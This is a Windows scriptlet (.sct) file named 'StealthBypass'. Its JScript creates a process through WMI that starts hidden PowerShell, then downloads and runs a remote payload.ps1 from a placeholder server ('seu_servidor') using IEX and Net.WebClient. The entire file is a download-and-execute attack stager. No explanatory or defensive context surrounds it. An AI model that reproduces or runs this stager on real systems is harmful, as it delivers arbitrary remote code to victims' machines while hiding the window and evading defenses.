<?XML version="1.0"?>
<scriptlet>
    <registration 
        progid="StealthBypass"
        classid="{AAAAAAAA-BBBB-CCCC-DDDD-EEEEEEEEEEEE}">
        <script language="JScript">
            <![CDATA[
                var wmi = GetObject("winmgmts:root\\cimv2");
                var process = wmi.Get("Win32_Process");
                process.Create("powershell -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://seu_servidor/payload.ps1')");
            ]]>
        </script>
    </registration>
</scriptlet>
